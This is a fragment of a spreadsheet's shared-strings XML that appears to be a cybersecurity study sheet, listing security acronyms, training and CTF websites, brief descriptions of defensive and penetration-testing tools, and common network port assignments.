    <t>Subscriber Identity Module</t>
  </si>
  <si>
    <t>SLA</t>
  </si>
  <si>
    <t>Service Level Agreement</t>
  </si>
  <si>
    <t>SLE</t>
  </si>
  <si>
    <t>Single Loss Expectancy</t>
  </si>
  <si>
    <t>SMS</t>
  </si>
  <si>
    <t>Short Message Service</t>
  </si>
  <si>
    <t>SMTP</t>
  </si>
  <si>
    <t>Simple Mail Transfer Protocol</t>
  </si>
  <si>
    <t>SNMP</t>
  </si>
  <si>
    <t>Simple Network Management Protocol</t>
  </si>
  <si>
    <t>SOAP</t>
  </si>
  <si>
    <t>Simple Object Access Protocol</t>
  </si>
  <si>
    <t>SONET</t>
  </si>
  <si>
    <t>Synchronous Optical Network Technologies</t>
  </si>
  <si>
    <t>SPIM</t>
  </si>
  <si>
    <t>Spam over Internet Messaging</t>
  </si>
  <si>
    <t>SQL</t>
  </si>
  <si>
    <t>Structured Query Language</t>
  </si>
  <si>
    <t>SSD</t>
  </si>
  <si>
    <t>Solid State Drive</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>Secure Shell</t>
  </si>
  <si>
    <t>SSL</t>
  </si>
  <si>
    <t>Secure Sockets Layer</t>
  </si>
  <si>
    <t>SSO</t>
  </si>
  <si>
    <t>Single Sign On</t>
  </si>
  <si>
    <t>STP</t>
  </si>
  <si>
    <t>Shielded Twisted Pair</t>
  </si>
  <si>
    <t>STRIDE</t>
  </si>
  <si>
    <t>Spoofing, Tampering, Repudiation, Information disclosure, DoS (Denial of Service), Elevation of Privilege</t>
  </si>
  <si>
    <t>TACACS+</t>
  </si>
  <si>
    <t>Terminal Access Controller Access Control System</t>
  </si>
  <si>
    <t>TCP/IP</t>
  </si>
  <si>
    <t>Transmission Control Protocol / Internet Protocol</t>
  </si>
  <si>
    <t>TGT</t>
  </si>
  <si>
    <t>Ticket Granting Ticket</t>
  </si>
  <si>
    <t>TKIP</t>
  </si>
  <si>
    <t>Temporal Key Integrity Protocol</t>
  </si>
  <si>
    <t>TLS</t>
  </si>
  <si>
    <t>Transport Layer Security</t>
  </si>
  <si>
    <t>TOTP</t>
  </si>
  <si>
    <t>Time Based On One Time Password</t>
  </si>
  <si>
    <t>TPM</t>
  </si>
  <si>
    <t>Trusted Platform Module</t>
  </si>
  <si>
    <t>TSIG</t>
  </si>
  <si>
    <t>Transaction Signature</t>
  </si>
  <si>
    <t>UAT</t>
  </si>
  <si>
    <t>User Acceptance Testing</t>
  </si>
  <si>
    <t>UEFI</t>
  </si>
  <si>
    <t>Unified Extensible Firmware Interface</t>
  </si>
  <si>
    <t>UDP</t>
  </si>
  <si>
    <t>User Datagram Protocol</t>
  </si>
  <si>
    <t>UPS</t>
  </si>
  <si>
    <t>Uninterruptable Power Supply</t>
  </si>
  <si>
    <t>URI</t>
  </si>
  <si>
    <t>Uniform Resource Identifier</t>
  </si>
  <si>
    <t>URL</t>
  </si>
  <si>
    <t>Universal Resource Locator</t>
  </si>
  <si>
    <t>USB</t>
  </si>
  <si>
    <t>Universal Serial Bus</t>
  </si>
  <si>
    <t>UTM</t>
  </si>
  <si>
    <t>Unified Threat Management</t>
  </si>
  <si>
    <t>UTP</t>
  </si>
  <si>
    <t>Unshielded Twisted Pair</t>
  </si>
  <si>
    <t>VDI</t>
  </si>
  <si>
    <t>Virtualization Desktop Infrastructure</t>
  </si>
  <si>
    <t>VLAN</t>
  </si>
  <si>
    <t>Virtual Local Area Network</t>
  </si>
  <si>
    <t>VoIP</t>
  </si>
  <si>
    <t>Voice over IP</t>
  </si>
  <si>
    <t>VPN</t>
  </si>
  <si>
    <t>Virtual Private Network</t>
  </si>
  <si>
    <t>VTC</t>
  </si>
  <si>
    <t>Video Teleconferencing</t>
  </si>
  <si>
    <t>WAF</t>
  </si>
  <si>
    <t>Web Application Firewall</t>
  </si>
  <si>
    <t>WAP</t>
  </si>
  <si>
    <t>Wireless Access Point</t>
  </si>
  <si>
    <t>WEP</t>
  </si>
  <si>
    <t>Wired Equivalent Privacy</t>
  </si>
  <si>
    <t>WIDS</t>
  </si>
  <si>
    <t>Wireless Intrusion Detection System</t>
  </si>
  <si>
    <t>WIPS</t>
  </si>
  <si>
    <t>Wireless Intrusion Prevention System</t>
  </si>
  <si>
    <t>WPA</t>
  </si>
  <si>
    <t>Wireless Protected Access</t>
  </si>
  <si>
    <t>WPA2</t>
  </si>
  <si>
    <t>WiFi Protected Access 2</t>
  </si>
  <si>
    <t>WPS</t>
  </si>
  <si>
    <t>WiFi Protected Setup</t>
  </si>
  <si>
    <t>WTLS</t>
  </si>
  <si>
    <t>Wireless TLS</t>
  </si>
  <si>
    <t>XML</t>
  </si>
  <si>
    <t>Extensible Markup Language</t>
  </si>
  <si>
    <t>XSRF</t>
  </si>
  <si>
    <t>Cross Site Request Forgery</t>
  </si>
  <si>
    <t>XSS</t>
  </si>
  <si>
    <t>Cross Site Scripting</t>
  </si>
  <si>
    <t>Tool:</t>
  </si>
  <si>
    <t>Useful For</t>
  </si>
  <si>
    <t>Link</t>
  </si>
  <si>
    <t>Web Application Security</t>
  </si>
  <si>
    <t>https://owasp.org/</t>
  </si>
  <si>
    <t>PortSwigger</t>
  </si>
  <si>
    <t>https://portswigger.net/</t>
  </si>
  <si>
    <t>Damn Vulnerable Web Application (DVWA)</t>
  </si>
  <si>
    <t>http://www.dvwa.co.uk/</t>
  </si>
  <si>
    <t>Hacksplaining</t>
  </si>
  <si>
    <t>https://www.hacksplaining.com/lessons</t>
  </si>
  <si>
    <t>Cybrary</t>
  </si>
  <si>
    <t>Security Courses</t>
  </si>
  <si>
    <t>https://www.cybrary.it/</t>
  </si>
  <si>
    <t>Cyber Security Degrees</t>
  </si>
  <si>
    <t>https://cybersecuritydegrees.org/</t>
  </si>
  <si>
    <t>eLearnSecurity</t>
  </si>
  <si>
    <t>https://www.elearnsecurity.com/</t>
  </si>
  <si>
    <t>ENISA Training Resources</t>
  </si>
  <si>
    <t>https://www.enisa.europa.eu/topics/trainings-for-cybersecurity-specialists/online-training-material</t>
  </si>
  <si>
    <t>Hacker101</t>
  </si>
  <si>
    <t>https://www.hacker101.com/</t>
  </si>
  <si>
    <t>Open Security Training</t>
  </si>
  <si>
    <t>http://www.opensecuritytraining.info/</t>
  </si>
  <si>
    <t>SANS Cyber Aces</t>
  </si>
  <si>
    <t>https://tutorials.cyberaces.org/</t>
  </si>
  <si>
    <t>Teaching Security</t>
  </si>
  <si>
    <t>https://teachingsecurity.org/</t>
  </si>
  <si>
    <t>Awesome Security List</t>
  </si>
  <si>
    <t>https://github.com/sindresorhus/awesome#security</t>
  </si>
  <si>
    <t xml:space="preserve">TeachCyber </t>
  </si>
  <si>
    <t>https://teachcyber.tk/</t>
  </si>
  <si>
    <t>Center for Information Security</t>
  </si>
  <si>
    <t>Security Controls</t>
  </si>
  <si>
    <t>https://www.cisecurity.org/controls/cis-controls-list</t>
  </si>
  <si>
    <t>Australian Signals Dictorate</t>
  </si>
  <si>
    <t>https://www.cyber.gov.au/learn-basics</t>
  </si>
  <si>
    <t>Crackmes.One</t>
  </si>
  <si>
    <t>Reverse Engineering</t>
  </si>
  <si>
    <t>https://crackmes.one/</t>
  </si>
  <si>
    <t>Pwn College</t>
  </si>
  <si>
    <t>Pen Testing</t>
  </si>
  <si>
    <t>https://pwn.college/</t>
  </si>
  <si>
    <t>Book - Web Hacking 101: How to Make Money Hacking Ethically  by PeterYaworski</t>
  </si>
  <si>
    <t>Click Here</t>
  </si>
  <si>
    <t>MITRE ATT&amp;CK® Navigator</t>
  </si>
  <si>
    <t>https://mitre-attack.github.io/attack-navigator/</t>
  </si>
  <si>
    <t>Root Me</t>
  </si>
  <si>
    <t>https://www.root-me.org/</t>
  </si>
  <si>
    <t>OverTheWire</t>
  </si>
  <si>
    <t>http://overthewire.org/wargames/</t>
  </si>
  <si>
    <t>Penetration Testing Practice Lab</t>
  </si>
  <si>
    <t>http://www.amanhardikar.com/mindmaps/PracticeUrls.html</t>
  </si>
  <si>
    <t>Cyber News - Common Passwords</t>
  </si>
  <si>
    <t>Password Security</t>
  </si>
  <si>
    <t>https://cybernews.com/best-password-managers/most-common-passwords/</t>
  </si>
  <si>
    <t>What is My IP</t>
  </si>
  <si>
    <t>IP Finder</t>
  </si>
  <si>
    <t>https://www.whatismyip.com/</t>
  </si>
  <si>
    <t>Exploit Database</t>
  </si>
  <si>
    <t>Exploits</t>
  </si>
  <si>
    <t>https://www.exploit-db.com/</t>
  </si>
  <si>
    <t>Exploit Exercises</t>
  </si>
  <si>
    <t>https://exploit-exercises.com/</t>
  </si>
  <si>
    <t>CTFd</t>
  </si>
  <si>
    <t>CTF</t>
  </si>
  <si>
    <t>https://ctfd.io/</t>
  </si>
  <si>
    <t>CTF Field Guide</t>
  </si>
  <si>
    <t>https://trailofbits.github.io/ctf/</t>
  </si>
  <si>
    <t>CTFtime</t>
  </si>
  <si>
    <t>https://ctftime.org/</t>
  </si>
  <si>
    <t xml:space="preserve">Hack Me </t>
  </si>
  <si>
    <t>https://hack.me/</t>
  </si>
  <si>
    <t xml:space="preserve">Hack This Site </t>
  </si>
  <si>
    <t>Hack This!!</t>
  </si>
  <si>
    <t>https://www.hackthissite.org/</t>
  </si>
  <si>
    <t xml:space="preserve">Hacker Test </t>
  </si>
  <si>
    <t>http://www.hackertest.net/</t>
  </si>
  <si>
    <t xml:space="preserve">Wargames </t>
  </si>
  <si>
    <t>Practice CTF List</t>
  </si>
  <si>
    <t>http://captf.com/practice-ctf/</t>
  </si>
  <si>
    <t>WeChall</t>
  </si>
  <si>
    <t>https://www.wechall.net/active_sites</t>
  </si>
  <si>
    <t>TryHackMe</t>
  </si>
  <si>
    <t>CS Training Platform</t>
  </si>
  <si>
    <t>https://tryhackme.com</t>
  </si>
  <si>
    <t>HackTheBox</t>
  </si>
  <si>
    <t>https://www.hackthebox.com/</t>
  </si>
  <si>
    <t>SANS</t>
  </si>
  <si>
    <t>https://www.sans.org/</t>
  </si>
  <si>
    <t>Secure Code Warrior</t>
  </si>
  <si>
    <t>https://portal.securecodewarrior.com/#/intro-splash</t>
  </si>
  <si>
    <t>MiMO</t>
  </si>
  <si>
    <t>Coding (Python, JavaScript, HTML, CSS)</t>
  </si>
  <si>
    <t>https://mimo.org/</t>
  </si>
  <si>
    <t>Avatao</t>
  </si>
  <si>
    <t>https://avatao.com/</t>
  </si>
  <si>
    <t>The C2 Matrix</t>
  </si>
  <si>
    <t>C2 Frameworks</t>
  </si>
  <si>
    <t>https://www.thec2matrix.com/matrix</t>
  </si>
  <si>
    <t>C2 Maxtix Spreadsheet (Filtering)</t>
  </si>
  <si>
    <t>CrowdStrike</t>
  </si>
  <si>
    <t>LeakCheck</t>
  </si>
  <si>
    <t>Reconnaisance</t>
  </si>
  <si>
    <t>https://leakcheck.io/en</t>
  </si>
  <si>
    <t>Dehashed</t>
  </si>
  <si>
    <t>https://www.dehashed.com/</t>
  </si>
  <si>
    <t>Whatsmyname.app</t>
  </si>
  <si>
    <t>https://whatsmyname.app/</t>
  </si>
  <si>
    <t>Australian Cyber Security Centre</t>
  </si>
  <si>
    <t>Malware</t>
  </si>
  <si>
    <t>https://www.cyber.gov.au/threats/types-threats/malware</t>
  </si>
  <si>
    <t>National Cyber Security Centre (UK)</t>
  </si>
  <si>
    <t>Malware / Ransomware</t>
  </si>
  <si>
    <t>https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks</t>
  </si>
  <si>
    <t>Definition</t>
  </si>
  <si>
    <t>Platform</t>
  </si>
  <si>
    <t>CryptTool</t>
  </si>
  <si>
    <t>Deciphers AES encryption ciphers and decodes Base64 ciphers. This tool also works well with deciphering Caesar ciphers.</t>
  </si>
  <si>
    <t>AES Encryption and Decryption</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>MITRE Attack Navigator:</t>
  </si>
  <si>
    <t>Web-based tool for annotating and exploring ATT&amp;CK matrices. It can be used to visualize defensive coverage, red/blue team planning, the frequency of detected techniques, and more.</t>
  </si>
  <si>
    <t>Attacker Exploits and Mitigation strategies.</t>
  </si>
  <si>
    <t>Web</t>
  </si>
  <si>
    <t>nslookup</t>
  </si>
  <si>
    <t>Cross-platform command for obtaining DNS records.</t>
  </si>
  <si>
    <t>DNS Records Lookup</t>
  </si>
  <si>
    <t>OpenSSL</t>
  </si>
  <si>
    <t>Generates private keys, create CSRs, install your SSL/TLS certificate, and identify certificate information.</t>
  </si>
  <si>
    <t>Encryption and Decryption</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>Splunk:</t>
  </si>
  <si>
    <t>Makes use of machine-generated data to get operational insights into threats, vulnerabilities, security technologies, and identity information.</t>
  </si>
  <si>
    <t>SIEM System</t>
  </si>
  <si>
    <t>Windows, Linux</t>
  </si>
  <si>
    <t>HxD</t>
  </si>
  <si>
    <t>Freeware hex editor, a tool that can open and edit computer code.</t>
  </si>
  <si>
    <t>Hex Editor</t>
  </si>
  <si>
    <t>ping</t>
  </si>
  <si>
    <t>Basic Internet program that allows a user to test and verify if a particular destination IP address</t>
  </si>
  <si>
    <t>ICMP IP Detection</t>
  </si>
  <si>
    <t>HashCalc:</t>
  </si>
  <si>
    <t>Finds the MD5sum of each file and match that with the md5 hash in terminal. This ensures integrity in evidence files and can find any inconsistencies in files</t>
  </si>
  <si>
    <t>MD5 calculations</t>
  </si>
  <si>
    <t>diff</t>
  </si>
  <si>
    <t>Compares the hashes of two files.</t>
  </si>
  <si>
    <t>MD5 Hashing</t>
  </si>
  <si>
    <t>Wireshark:</t>
  </si>
  <si>
    <t>Packet sniffer and analysis tool. It captures network traffic from ethernet, Bluetooth, wireless (IEEE. 802.11), token ring, and frame relay connections, among others, and stores that data for offline analysis.</t>
  </si>
  <si>
    <t>Network Traffic Monitoring</t>
  </si>
  <si>
    <t>OphCrack:</t>
  </si>
  <si>
    <t>Free open-source program that cracks Windows log-in passwords by using LM hashes through rainbow tables.</t>
  </si>
  <si>
    <t>NTLM Decryption</t>
  </si>
  <si>
    <t>John the ripper</t>
  </si>
  <si>
    <t>Free password cracking software tool that matches MD5 hashes from wordlist passwords.</t>
  </si>
  <si>
    <t>Password Cracking</t>
  </si>
  <si>
    <t>Hashcat</t>
  </si>
  <si>
    <t xml:space="preserve">Powerful tool that helps to crack password hashes. </t>
  </si>
  <si>
    <t>Rainbrow Crack</t>
  </si>
  <si>
    <t>Generates rainbow tables to be used in password cracking.</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>Parallelized network login cracker available on Kali Linux.</t>
  </si>
  <si>
    <t>Kali Linux</t>
  </si>
  <si>
    <t>GPG:</t>
  </si>
  <si>
    <t>Free Command line tool on linux systems used to simplify the creation, encryption, and decryption of assymetric key cryptography.</t>
  </si>
  <si>
    <t>Asymmetric Cryptography</t>
  </si>
  <si>
    <t>StegDetect:</t>
  </si>
  <si>
    <t>An automated tool for detecting steganographic content in images.</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>JpSeek</t>
  </si>
  <si>
    <t>Finds any hidden text files within JPG images</t>
  </si>
  <si>
    <t>S-Tools</t>
  </si>
  <si>
    <t>Stegonographic tool which allows you to examine a picture file for any hidden .txt files.</t>
  </si>
  <si>
    <t>Steghide</t>
  </si>
  <si>
    <t>Tool to hide .txt files within an image file</t>
  </si>
  <si>
    <t>gzip</t>
  </si>
  <si>
    <t>Tool for compressing and zipping tar file</t>
  </si>
  <si>
    <t>Tar Compressor</t>
  </si>
  <si>
    <t>Aircrack-ng</t>
  </si>
  <si>
    <t>Complete suite of tools to assess WiFi network security.</t>
  </si>
  <si>
    <t>WIFI Reconnaissance Security Tool</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>Network scanning tool—an open source Linux command-line tool—used for network exploration, host discovery, and security auditing.</t>
  </si>
  <si>
    <t>Network scanning</t>
  </si>
  <si>
    <t>OpenPuff</t>
  </si>
  <si>
    <t>Tool capable of performing steganography over a large number of different file formats, concretely (as listed on the tool's website) sixteen, covering media</t>
  </si>
  <si>
    <t>sha256sum</t>
  </si>
  <si>
    <t>Creates a Sha256 hash of an input</t>
  </si>
  <si>
    <t>Encryption</t>
  </si>
  <si>
    <t>Whatismyip</t>
  </si>
  <si>
    <t>Public IP Lookup tool</t>
  </si>
  <si>
    <t>IP Search</t>
  </si>
  <si>
    <t>pfsense</t>
  </si>
  <si>
    <t>Free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>UFW</t>
  </si>
  <si>
    <t>Multifunctional firewall that provides stateless and stateful packet filtering and is the Linux firewall.</t>
  </si>
  <si>
    <t>Firewalld</t>
  </si>
  <si>
    <t>Dynamically managed firewall that uses zones to divide network interfaces into groups of shared trust level. The zones are assigned sets of rules depending on the needs and restrictions of each zone’s interfaces.</t>
  </si>
  <si>
    <t>SecurityOnion</t>
  </si>
  <si>
    <t>Free and open Linux distribution for threat hunting, enterprise security monitoring, and log management.</t>
  </si>
  <si>
    <t>Linux SecOnion</t>
  </si>
  <si>
    <t>Snort IDS engine</t>
  </si>
  <si>
    <t>Open-source, free and lightweight network intrusion detection system (NIDS) software for Linux and Windows to detect emerging threats.</t>
  </si>
  <si>
    <t>Linux, Windows</t>
  </si>
  <si>
    <t>Sguil</t>
  </si>
  <si>
    <t>Free software components for Network Security Monitoring and event driven analysis of IDS alerts.</t>
  </si>
  <si>
    <t>NSM</t>
  </si>
  <si>
    <t>Transcript</t>
  </si>
  <si>
    <t>Inbuilt Sguill module that allows  the readability of events.</t>
  </si>
  <si>
    <t>NetworkMiner</t>
  </si>
  <si>
    <t>NetworkMiner is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files.</t>
  </si>
  <si>
    <t>OSSEC</t>
  </si>
  <si>
    <t>Free, open-source host-based intrusion detection system. It performs log analysis, integrity checking, Windows registry monitoring, rootkit detection, time-based alerting, and active response.</t>
  </si>
  <si>
    <t xml:space="preserve">Squert
</t>
  </si>
  <si>
    <t>web application that is used to query and view event data stored in a Sguil database (typically IDS alert data)</t>
  </si>
  <si>
    <t>ESM</t>
  </si>
  <si>
    <t>Kibana</t>
  </si>
  <si>
    <t xml:space="preserve">A browser-based visualization interface. It uses thousands of data points from the Elastic Stack as its core engine.
</t>
  </si>
  <si>
    <t>Docker</t>
  </si>
  <si>
    <t>We can use Docker to distribute software, as an alternative to installing the software directly on a host machine.</t>
  </si>
  <si>
    <t>Container Operations</t>
  </si>
  <si>
    <t>Microsoft Azure</t>
  </si>
  <si>
    <t>a cloud computing platform run by Microsoft, which offers access, management, and development of applications and services through global data centers</t>
  </si>
  <si>
    <t>Cloud Computing</t>
  </si>
  <si>
    <t>Cloud</t>
  </si>
  <si>
    <t>Amazon WorkSpace</t>
  </si>
  <si>
    <t>Provides the right virtual workspace for varied worker types, especially hybrid and remote workers.</t>
  </si>
  <si>
    <t>Google Cloud</t>
  </si>
  <si>
    <t xml:space="preserve">A suite of cloud computing services that runs on the same infrastructure that Google uses internally for their own consumer products, such as Google Search, Gmail, and YouTube. </t>
  </si>
  <si>
    <t>DB Fiddle</t>
  </si>
  <si>
    <t>Online SQL database playground for testing, debugging and sharing SQL snippets.</t>
  </si>
  <si>
    <t>Database</t>
  </si>
  <si>
    <t>https://www.db-fiddle.com/</t>
  </si>
  <si>
    <t>CRT.sh</t>
  </si>
  <si>
    <t>Certificate checker tool for OSINT</t>
  </si>
  <si>
    <t xml:space="preserve">Certificate Search
</t>
  </si>
  <si>
    <t>https://crt.sh/</t>
  </si>
  <si>
    <t>Shodan.io</t>
  </si>
  <si>
    <t>Search Engine for Internet-Connected devices.</t>
  </si>
  <si>
    <t>https://www.shodan.io/</t>
  </si>
  <si>
    <t>Nessus</t>
  </si>
  <si>
    <t>Scans for security vulnerabilities in devices, applications, operating systems, cloud services and other network resources.</t>
  </si>
  <si>
    <t>Vulnerability Scanner</t>
  </si>
  <si>
    <t>hping</t>
  </si>
  <si>
    <t>open-source packet generator and analyzer for the TCP/IP protocol</t>
  </si>
  <si>
    <t>Zenmap</t>
  </si>
  <si>
    <t>Official Nmap Security Scanner GUI</t>
  </si>
  <si>
    <t>Network Scanning</t>
  </si>
  <si>
    <t>SearchSploit</t>
  </si>
  <si>
    <t>Local store library of exploit information. It is a command-line utility for Exploit-DB that allows you to take an offline copy of the Exploit Database with you wherever you go</t>
  </si>
  <si>
    <t>Local Exploit Library</t>
  </si>
  <si>
    <t>MSFconsole:</t>
  </si>
  <si>
    <t>Terminal of Metasploit which offers a centralized console to access all the options and modules. MSFconsole runs on your local machine, not on the machines you compromise.</t>
  </si>
  <si>
    <t>Exploitation</t>
  </si>
  <si>
    <t>Meterpreter:</t>
  </si>
  <si>
    <t xml:space="preserve">A Linux-style shell that Metasploit launches when you successfully break into a target machine. Unlike MSFconsole, Meterpreter runs on the machines you compromise, not on your local machine.
</t>
  </si>
  <si>
    <t>msfvenom:</t>
  </si>
  <si>
    <t xml:space="preserve">Allows the operator to craft the malicious agents and payloads that will be used to communicate back with Metasploit.
</t>
  </si>
  <si>
    <t>Metasploit - distcc</t>
  </si>
  <si>
    <t>Metasploit tool for compiling code. It runs as a daemon with low permissions, and this version is vulnerable.</t>
  </si>
  <si>
    <t>Responder</t>
  </si>
  <si>
    <t>Tool for listening for LLMNR Responses to catch broadcasted passwords</t>
  </si>
  <si>
    <t>LLMNR Poisoning</t>
  </si>
  <si>
    <t>Data breach search engine</t>
  </si>
  <si>
    <t>Provides free deep-web scans and protection against credential leaks.</t>
  </si>
  <si>
    <t>This tool allows you to enumerate usernames across many websites. Simply, it is the best free username enumeration tool available.</t>
  </si>
  <si>
    <t>Mimikatz:</t>
  </si>
  <si>
    <t>Windows-purposed credential dumping tool that is able to decrypt almost all stored credentials in Windows.</t>
  </si>
  <si>
    <t>Port Number</t>
  </si>
  <si>
    <t>Service Name</t>
  </si>
  <si>
    <t>Transfer Protocol</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>The Most Common Ports for Exams</t>
  </si>
  <si>
    <t>Echo</t>
  </si>
  <si>
    <t>TCP, UDP</t>
  </si>
  <si>
    <t>Echo service</t>
  </si>
  <si>
    <t>20, 21</t>
  </si>
  <si>
    <t>TCP, UDP, SCTP</t>
  </si>
  <si>
    <t>File Transfer Protocol command control</t>
  </si>
  <si>
    <t>SSH/SCP</t>
  </si>
  <si>
    <t>Secure Shell, secure logins, file transfers (scp, sftp), and port forwarding</t>
  </si>
  <si>
    <t>Telnet</t>
  </si>
  <si>
    <t>TCP</t>
  </si>
  <si>
    <t>Telnet protocol, for unencrypted text communications</t>
  </si>
  <si>
    <t>Simple Mail Transfer Protocol, used for email routing between mail servers</t>
  </si>
  <si>
    <t>Domain Name System name resolver</t>
  </si>
  <si>
    <t>67, 68</t>
  </si>
  <si>
    <t>DHCP/BOOTP</t>
  </si>
  <si>
    <t>Dynamic Host Configuration Protocol and its predecessor Bootstrap Protocol Server; server port</t>
  </si>
  <si>
    <t>TFTP</t>
  </si>
  <si>
    <t>Trivial File Transfer Protocol</t>
  </si>
  <si>
    <t>Hypertext Transfer Protocol (HTTP) uses TCP in versions 1.x and 2. HTTP/3 uses QUIC, a transport protocol on top of UDP</t>
  </si>
  <si>
    <t>Kerberos</t>
  </si>
  <si>
    <t>Network authentication system</t>
  </si>
  <si>
    <t>POP3</t>
  </si>
  <si>
    <t>Post Office Protocol, version 3 (POP3)</t>
  </si>
  <si>
    <t>NetBIOS</t>
  </si>
  <si>
    <t>NetBIOS Name Service, used for name registration and resolution</t>
  </si>
  <si>
    <t>IMAP</t>
  </si>
  <si>
    <t>Internet Message Access Protocol (IMAP), management of electronic mail messages on a server</t>
  </si>
  <si>
    <t>Simple network management protocol; agents communicate on this port</t>
  </si>
  <si>
    <t>Lightweight directory access protocol</t>
  </si>
  <si>
    <t>Hypertext Transfer Protocol Secure (HTTPS) uses TCP in versions 1.x and 2. HTTP/3 uses QUIC, a transport protocol on top of UDP.</t>
  </si>
  <si>
    <t>Microsoft DS SMB</t>
  </si>
  <si>
    <t>Microsoft Directory Services: TCP for Active Directory, Windows shares; UDP for Server Message Block (SMB) file-sharing</t>
  </si>
  <si>
    <t>Kerberos password settings</t>
  </si>
  <si>
    <t>For password settings on Kerberos</t>
  </si>
  <si>
    <t>DHCPv6</t>
  </si>
  <si>
    <t>DHCPv6 Servers and DHCPv6 Relay Agents listen for DHCPv6 messages on UDP port 547.</t>
  </si>
  <si>
    <t>SMSD</t>
  </si>
  <si>
    <t>SysMan Station daemon</t>
  </si>
  <si>
    <t>LDAP over SSL</t>
  </si>
  <si>
    <t>Lightweight Directory Access Protocol over TLS/SSL</t>
  </si>
  <si>
    <t>H.323</t>
  </si>
  <si>
    <t>H.323 Call Control Signaling, a VoIP call control protocol</t>
  </si>
  <si>
    <t>RDP</t>
  </si>
  <si>
    <t>Windows Remote Desktop Protocol (Microsoft Terminal Server)</t>
  </si>
  <si>
    <t>SIP</t>
  </si>
  <si>
    <t>Session Initiation Protocol</t>
  </si>
  <si>
    <t>SIP over TLS</t>
  </si>
  <si>
    <t>Session Initiation Protocol over TLS</t>
  </si>
  <si>
    <t>Well-known/System Ports: 0 – 1023</t>
  </si>
  <si>
    <t>CHARGEN</t>
  </si>
  <si>
    <t>Character Generator Protocol, has severe vulnerabilities and thus is rarely used nowadays</t>
  </si>
  <si>
    <t>FTP-data</t>
  </si>
  <si>
    <t>TCP, SCTP</t>
  </si>
  <si>
    <t>File Transfer Protocol data transfer</t>
  </si>
  <si>
    <t>SSH/SCP/SFTP</t>
  </si>
  <si>
    <t>WINS Replication</t>
  </si>
  <si>
    <t>Microsoft Windows Internet Name Service, vulnerable to attacks on a local network</t>
  </si>
  <si>
    <t>WHOIS</t>
  </si>
  <si>
    <t>Whois service, provides domain-level information</t>
  </si>
  <si>
    <t>TACACS</t>
  </si>
  <si>
    <t>UDP; can also use TCP but not necessarily on port 49</t>
  </si>
  <si>
    <t>Terminal Access Controller Access-Control System, provides remote authentication and related services for network access</t>
  </si>
  <si>
    <t>Dynamic Host Configuration Protocol and its predecessor Bootstrap Protocol Server; client port</t>
  </si>
  <si>
    <t>Gopher</t>
  </si>
  <si>
    <t>Gopher is a communication protocol for distributing, searching, and retrieving documents in Internet Protocol (IP) networks</t>
  </si>
  <si>
    <t>Finger</t>
  </si>
  <si>
    <t>Name/Finger protocol and Finger user information protocol, for retrieving and manipulating user information</t>
  </si>
  <si>
    <t>Microsoft Exchange ISO-TSAP</t>
  </si>
  <si>
    <t>Microsoft Exchange ISO Transport Service Access Point (TSAP) Class 0 protocol</t>
  </si>
  <si>
    <t>Ident</t>
  </si>
  <si>
    <t>Identification Protocol, for identifying the user of a particular TCP connection</t>
  </si>
  <si>
    <t>NNTP (Usenet)</t>
  </si>
  <si>
    <t>Network News Transfer Protocol</t>
  </si>
  <si>
    <t>Microsoft RPC EPMAP</t>
  </si>
  <si>
    <t>Microsoft Remote Procedure Call (RPC) Endpoint Mapper (EPMAP) service, for remote system access and management</t>
  </si>
  <si>
    <t>NetBIOS-ns</t>
  </si>
  <si>
    <t>NetBIOS-dgm</t>
  </si>
  <si>
    <t>NetBIOS Datagram Service, used for providing access to shared resources</t>
  </si>
  <si>
    <t>NetBIOS-ssn</t>
  </si>
  <si>
    <t>NetBIOS Session Service</t>
  </si>
  <si>
    <t>SNMP-agents (unencrypted)</t>
  </si>
  <si>
    <t>SNMP-trap (unencrypted)</t>
  </si>
  <si>
    <t>Simple network management protocol; listens for asynchronous traps</t>
  </si>
  <si>
    <t>XDMCP</t>
  </si>
  <si>
    <t>X Display Manager Control Protocol</t>
  </si>
  <si>
    <t>BGP</t>
  </si>
  <si>
    <t>Border Gateway Protocol</t>
  </si>
  <si>
    <t>AppleTalk</t>
  </si>
  <si>
    <t>AppleTalk Routing Maintenance. Trojan horses and computer viruses have used UDP port 201.</t>
  </si>
  <si>
    <t>BGMP</t>
  </si>
  <si>
    <t>Border Gateway Multicast Protocol</t>
  </si>
  <si>
    <t>TSP</t>
  </si>
  <si>
    <t>Time Stamp Protocol</t>
  </si>
  <si>
    <t>HP Openview</t>
  </si>
  <si>
    <t>HP performance data collector</t>
  </si>
  <si>
    <t>HP data alarm manager</t>
  </si>
  <si>
    <t>(Multiple uses)</t>
  </si>
  <si>
    <t>Direct Connect Hub, Remote MT Protocol</t>
  </si>
  <si>
    <t>Direct Connect Client-to-Client, Trap Convention Port</t>
  </si>
  <si>
    <t>SLP</t>
  </si>
  <si>
    <t>Service Location Protocol</t>
  </si>
  <si>
    <t>HTTPS (HTTP over SSL)</t>
  </si>
  <si>
    <t>SMTP over TLS/SSL, SSM</t>
  </si>
  <si>
    <t>Authenticated SMTP over TLS/SSL (SMTPS), URL Rendezvous Directory for Cisco’s Source Specific Multicast protocol (SSM)</t>
  </si>
  <si>
    <t>Dantz Retrospect</t>
  </si>
  <si>
    <t>A software suite for backing up operating systems</t>
  </si>
  <si>
    <t>IPSec / ISAKMP / IKE</t>
  </si>
  <si>
    <t>Internet Protocol Security / Internet Security Association and Key Management Protocol / Internet Key Exchange</t>
  </si>
  <si>
    <t>rexec</t>
  </si>
  <si>
    <t>Remote Process Execution</t>
  </si>
  <si>
    <t>rlogin</t>
  </si>
  <si>
    <t>The Unix program rlogin allows users to log in on another host using a network.</t>
  </si>
  <si>
    <t>syslog</t>
  </si>
  <si>
    <t>Syslog Protocol, for collecting and organizing all of the log files sent from the various devices on a network</t>
  </si>
  <si>
    <t>LPD/LPR</t>
  </si>
  <si>
    <t>Line Printer Daemon protocol, or Line Printer Remote protocol</t>
  </si>
  <si>
